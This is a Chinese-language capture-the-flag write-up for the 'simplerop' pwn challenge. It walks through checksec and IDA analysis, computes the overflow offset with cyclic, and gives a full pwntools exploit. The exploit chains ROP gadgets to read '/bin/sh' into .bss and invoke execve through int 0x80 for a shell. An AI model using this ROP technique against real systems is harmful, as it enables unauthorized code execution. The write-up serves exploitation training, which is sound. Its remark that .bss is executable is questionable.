cmcc_simplerop解题过程

分析

使用checksec分析可知，simplerop只开启了NX保护，即栈不可执行，于是只能从其他内存空间下手。

接着使用IDA进行反汇编，分析代码可知该程序使用了read函数，即存在栈溢出漏洞，但是如果把shell放在栈上肯定是行不通的。与此同时，注意read()中的函数，其输入的v4在bss段，而bss段是可执行的。

到此，思路明确，我们可以通过read()函数把shell写入其中，然后通过执行bss段的shell来获取"/bin/sh"权限。

解题

1. 先利用cyclic计算偏移

pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

pwndbg> r
Starting program: /home/henhen/Desktop/challenges/simplerop/simplerop 
ROP is easy is'nt it ?
Your input :aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616169 in ?? ()

cyclic - l 0x61616169
32

得出偏移量为32

2. 获取read函数地址，利用其写入ROP链,进行三次ret然后达成目的

ret流程图如下

最终exp如下

from pwn import *

p = process('./simplerop')

read_addr = 0x806CD50

int_80h_addr = 0x080493e1

pop_edx_ecx_ebx_ret = 0x0806e850

pop_eax_ret = 0x080bae06

bin_sh_addr = 0x80eb584

payload = b'a' * 0x20 + p32(read_addr) + p32(pop_edx_ecx_ebx_ret) 
payload += p32(0) + p32(bin_sh_addr) + p32(8) 
#将/bin/sh写入bss段,read(0,bin_sh_addr,8),
#                       fd    buf     size
#写完之后返回read函数，输入下面的payload
payload += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(bin_sh_addr) + p32(pop_eax_ret) + p32(0xb) + p32(int_80h_addr)
#将int_80(11,bin_sh_addr,0,0)写入bss段
#   系统调用号 缓冲区地址 

p.sendline(payload)

p.send("/bin/sh\x00")

p.interactive()

总结

对于该类静态编译的题目，可以利用其可读可执行段(.bss)地址不改变，然后通过构造ROP链进行攻击，这里主要利用int 0x80系统调用执行execve(“/bin/sh”)来达成获取权限的目的。